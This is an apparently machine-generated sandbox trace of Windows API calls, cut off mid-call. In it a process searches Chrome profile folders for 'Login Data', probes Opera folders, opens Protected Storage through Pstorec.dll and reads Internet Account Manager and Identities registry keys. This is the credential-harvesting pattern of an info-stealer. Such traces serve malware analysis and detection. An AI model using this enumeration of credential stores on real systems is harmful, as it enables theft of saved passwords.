(lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.196] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.196] lstrlenW (lpString="FileTypePolicies") returned 16 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.196] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x63d588 [0590.196] LocalFree (hMem=0x5e6088) returned 0x0 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 72 [0590.196] lstrlenW (lpString="\\*.*") returned 4 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 72 [0590.196] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d6b0 [0590.196] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.196] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.196] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.196] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.196] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.197] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.197] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.197] LocalFree (hMem=0x63d6b0) returned 0x0 [0590.197] LocalFree (hMem=0x63d588) returned 0x0 [0590.197] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.197] lstrlenW (lpString="\\") returned 1 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.197] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.197] lstrlenW (lpString="First Run") returned 9 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.197] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5d0e30 [0590.197] LocalFree (hMem=0x5e6088) returned 0x0 [0590.197] StrStrIW (lpFirst="First Run", lpSrch="Login Data") returned 0x0 [0590.197] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.197] lstrlenW (lpString="\\") returned 1 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.197] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.197] lstrlenW (lpString="Local State") returned 11 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.197] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d1290 [0590.197] LocalFree (hMem=0x5e6088) returned 0x0 [0590.197] StrStrIW (lpFirst="Local State", lpSrch="Login Data") returned 0x0 [0590.197] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.197] lstrcmpiW (lpString1="OriginTrials", lpString2=".") returned 1 [0590.197] lstrcmpiW (lpString1="OriginTrials", lpString2="..") returned 1 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.197] lstrlenW (lpString="\\") returned 1 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.197] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.197] lstrlenW (lpString="OriginTrials") returned 12 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.197] LocalAlloc (uFlags=0x40, uBytes=0x10a) returned 0x5ed570 [0590.197] LocalFree (hMem=0x5e6088) returned 0x0 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 68 [0590.197] lstrlenW (lpString="\\*.*") returned 4 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 68 [0590.197] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x63d588 [0590.197] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.197] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.197] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.197] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.197] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.197] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.197] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.197] LocalFree (hMem=0x63d588) returned 0x0 [0590.197] LocalFree (hMem=0x5ed570) returned 0x0 [0590.197] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.197] lstrcmpiW (lpString1="PepperFlash", lpString2=".") returned 1 [0590.197] lstrcmpiW (lpString1="PepperFlash", lpString2="..") returned 1 [0590.197] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.198] lstrlenW (lpString="\\") returned 1 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.198] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.198] lstrlenW (lpString="PepperFlash") returned 11 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.198] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed570 [0590.198] LocalFree (hMem=0x5e6088) returned 0x0 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 67 [0590.198] lstrlenW (lpString="\\*.*") returned 4 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 67 [0590.198] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5ed688 [0590.198] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.198] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.198] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.198] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.198] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.198] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.198] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.198] LocalFree (hMem=0x5ed688) returned 0x0 [0590.198] LocalFree (hMem=0x5ed570) returned 0x0 [0590.198] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.198] lstrcmpiW (lpString1="pnacl", lpString2=".") returned 1 [0590.198] lstrcmpiW (lpString1="pnacl", lpString2="..") returned 1 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.198] lstrlenW (lpString="\\") returned 1 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.198] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.198] lstrlenW (lpString="pnacl") returned 5 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.198] LocalAlloc (uFlags=0x40, uBytes=0xfc) returned 0x5e6188 [0590.198] LocalFree (hMem=0x5e6088) returned 0x0 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 61 [0590.198] lstrlenW (lpString="\\*.*") returned 4 [0590.198] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 61 [0590.198] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed570 [0590.198] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.198] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.198] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.198] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.198] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.198] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.198] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.198] LocalFree (hMem=0x5ed570) returned 0x0 [0590.198] LocalFree (hMem=0x5e6188) returned 0x0 [0590.198] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.198] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2=".") returned 1 [0590.199] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="..") returned 1 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.199] lstrlenW (lpString="\\") returned 1 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.199] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.199] lstrlenW (lpString="SSLErrorAssistant") returned 17 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.199] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x63d588 [0590.199] LocalFree (hMem=0x5e6088) returned 0x0 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 73 [0590.199] lstrlenW (lpString="\\*.*") returned 4 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 73 [0590.199] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x63d6b0 [0590.199] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.199] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.199] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.199] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.199] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.199] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.199] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.199] LocalFree (hMem=0x63d6b0) returned 0x0 [0590.199] LocalFree (hMem=0x63d588) returned 0x0 [0590.199] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.199] lstrcmpiW (lpString1="SwReporter", lpString2=".") returned 1 [0590.199] lstrcmpiW (lpString1="SwReporter", lpString2="..") returned 1 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.199] lstrlenW (lpString="\\") returned 1 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.199] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.199] lstrlenW (lpString="SwReporter") returned 10 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.199] LocalAlloc (uFlags=0x40, uBytes=0x106) returned 0x5ed570 [0590.199] LocalFree (hMem=0x5e6088) returned 0x0 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 66 [0590.199] lstrlenW (lpString="\\*.*") returned 4 [0590.199] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 66 [0590.199] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5ed688 [0590.199] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.199] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.199] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.199] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.199] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.199] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.199] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.199] LocalFree (hMem=0x5ed688) returned 0x0 [0590.199] LocalFree (hMem=0x5ed570) returned 0x0 [0590.199] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.200] lstrcmpiW (lpString1="WidevineCdm", lpString2=".") returned 1 [0590.200] lstrcmpiW (lpString1="WidevineCdm", lpString2="..") returned 1 [0590.200] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.200] lstrlenW (lpString="\\") returned 1 [0590.200] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.200] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.200] lstrlenW (lpString="WidevineCdm") returned 11 [0590.200] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.200] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed570 [0590.200] LocalFree (hMem=0x5e6088) returned 0x0 [0590.200] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 67 [0590.200] lstrlenW (lpString="\\*.*") returned 4 [0590.200] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 67 [0590.200] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5ed688 [0590.200] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.200] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.200] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.200] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.200] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.200] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.200] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.200] LocalFree (hMem=0x5ed688) returned 0x0 [0590.200] LocalFree (hMem=0x5ed570) returned 0x0 [0590.200] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 0 [0590.200] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.200] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.200] LocalFree (hMem=0x59f8b0) returned 0x0 [0590.200] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e08c | out: lpFindFileData=0x52e08c) returned 0 [0590.200] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0590.200] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.200] LocalFree (hMem=0x2ed0060) returned 0x0 [0590.200] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.200] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0590.201] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0590.201] lstrlenW (lpString="C:\\ProgramData") returned 14 [0590.201] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0x5b7378 [0590.201] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.201] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0590.201] lstrlenW (lpString="\\*.*") returned 4 [0590.201] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0590.201] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0x5d5258 [0590.201] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Google\\Chrome\\*.*", lpFindFileData=0x52e0bc | out: lpFindFileData=0x52e0bc) returned 0xffffffff [0590.201] LocalFree (hMem=0x5d5258) returned 0x0 [0590.201] LocalFree (hMem=0x5b7378) returned 0x0 [0590.201] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.201] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0590.201] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0590.201] lstrlenW (lpString="C:\\ProgramData") returned 14 [0590.201] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0x5b7378 [0590.201] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.201] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0590.201] lstrlenW (lpString="\\*.*") returned 4 [0590.201] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0590.201] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0x5d5258 [0590.201] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Google\\Chrome\\*.*", lpFindFileData=0x52e0ac | out: lpFindFileData=0x52e0ac) returned 0xffffffff [0590.201] LocalFree (hMem=0x5d5258) returned 0x0 [0590.201] LocalFree (hMem=0x5b7378) returned 0x0 [0590.201] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.201] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0590.201] lstrlenW (lpString="\\Opera Software") returned 15 [0590.201] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0590.201] LocalAlloc (uFlags=0x40, uBytes=0xe2) returned 0x2ed2ab0 [0590.201] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.201] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software") returned 48 [0590.201] lstrlenW (lpString="\\*.*") returned 4 [0590.201] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software") returned 48 [0590.201] LocalAlloc (uFlags=0x40, uBytes=0xea) returned 0x59f8b0 [0590.201] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\*.*", lpFindFileData=0x52e0b8 | out: lpFindFileData=0x52e0b8) returned 0xffffffff [0590.202] LocalFree (hMem=0x59f8b0) returned 0x0 [0590.202] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.202] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0590.202] lstrlenW (lpString="\\Opera Software") returned 15 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0xe2) returned 0x2ed2ab0 [0590.202] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software") returned 48 [0590.202] lstrlenW (lpString="\\*.*") returned 4 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software") returned 48 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0xea) returned 0x59f8b0 [0590.202] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\*.*", lpFindFileData=0x52e0a8 | out: lpFindFileData=0x52e0a8) returned 0xffffffff [0590.202] LocalFree (hMem=0x59f8b0) returned 0x0 [0590.202] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.202] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0590.202] lstrlenW (lpString="\\Opera Software") returned 15 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0060 [0590.202] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Opera Software") returned 46 [0590.202] lstrlenW (lpString="\\*.*") returned 4 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Opera Software") returned 46 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ab0 [0590.202] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Opera Software\\*.*", lpFindFileData=0x52e098 | out: lpFindFileData=0x52e098) returned 0xffffffff [0590.202] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.202] LocalFree (hMem=0x2ed0060) returned 0x0 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.202] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0590.202] lstrlenW (lpString="\\Opera Software") returned 15 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0060 [0590.202] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Opera Software") returned 46 [0590.202] lstrlenW (lpString="\\*.*") returned 4 [0590.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Opera Software") returned 46 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ab0 [0590.202] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Opera Software\\*.*", lpFindFileData=0x52e088 | out: lpFindFileData=0x52e088) returned 0xffffffff [0590.202] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.202] LocalFree (hMem=0x2ed0060) returned 0x0 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.202] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0590.202] lstrlenW (lpString="\\Opera Software") returned 15 [0590.202] lstrlenW (lpString="C:\\ProgramData") returned 14 [0590.202] LocalAlloc (uFlags=0x40, uBytes=0xbc) returned 0x5b7378 [0590.202] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.202] lstrlenW (lpString="C:\\ProgramData\\Opera Software") returned 29 [0590.202] lstrlenW (lpString="\\*.*") returned 4 [0590.203] lstrlenW (lpString="C:\\ProgramData\\Opera Software") returned 29 [0590.203] LocalAlloc (uFlags=0x40, uBytes=0xc4) returned 0x5d5258 [0590.203] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Opera Software\\*.*", lpFindFileData=0x52e0b8 | out: lpFindFileData=0x52e0b8) returned 0xffffffff [0590.203] LocalFree (hMem=0x5d5258) returned 0x0 [0590.203] LocalFree (hMem=0x5b7378) returned 0x0 [0590.203] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.203] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0590.203] lstrlenW (lpString="\\Opera Software") returned 15 [0590.203] lstrlenW (lpString="C:\\ProgramData") returned 14 [0590.203] LocalAlloc (uFlags=0x40, uBytes=0xbc) returned 0x5b7378 [0590.203] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.203] lstrlenW (lpString="C:\\ProgramData\\Opera Software") returned 29 [0590.203] lstrlenW (lpString="\\*.*") returned 4 [0590.203] lstrlenW (lpString="C:\\ProgramData\\Opera Software") returned 29 [0590.203] LocalAlloc (uFlags=0x40, uBytes=0xc4) returned 0x5d5258 [0590.203] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Opera Software\\*.*", lpFindFileData=0x52e0a8 | out: lpFindFileData=0x52e0a8) returned 0xffffffff [0590.203] LocalFree (hMem=0x5d5258) returned 0x0 [0590.203] LocalFree (hMem=0x5b7378) returned 0x0 [0590.203] LoadLibraryW (lpLibFileName="Pstorec.dll") returned 0x74290000 [0590.205] GetProcAddress (hModule=0x74290000, lpProcName="PStoreCreateInstance") returned 0x7429526c [0590.205] PStoreCreateInstance () returned 0x0 [0590.207] FreeLibrary (hLibModule=0x74290000) returned 1 [0590.208] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Account Manager\\Accounts", phkResult=0x52d320 | out: phkResult=0x52d320*=0x0) returned 0x2 [0590.208] lstrlenW (lpString="Software\\Microsoft\\Internet Account Manager\\Accounts") returned 52 [0590.208] lstrlenW (lpString="\\") returned 1 [0590.208] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5e6f98 [0590.208] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Identities", phkResult=0x52d324 | out: phkResult=0x52d324*=0x4d0) returned 0x0 [0590.208] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x52d328, lpcchName=0x52d320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpcchName=0x52d320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.208] lstrlenW (lpString="\\") returned 1 [0590.208] lstrlenW (lpString="Identities") returned 10 [0590.208] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0590.208] lstrlenW (lpString="{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 38 [0590.208] lstrlenW (lpString="Identities\\") returned 11 [0590.208] LocalAlloc (uFlags=0x40, uBytes=0xe4) returned 0x2ed2ab0 [0590.208] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.208] lstrlenW (lpString="\\Software\\Microsoft\\Internet Account Manager\\Accounts") returned 53 [0590.208] lstrlenW 